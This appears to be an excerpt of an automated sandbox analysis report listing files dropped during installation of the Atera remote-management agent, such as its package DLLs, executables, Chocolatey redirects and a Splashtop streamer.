                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI56F2.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICA80.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA8AC.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAC76.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4a.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2FBD.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4b.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.WinForm.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\es\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: 692c4e.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
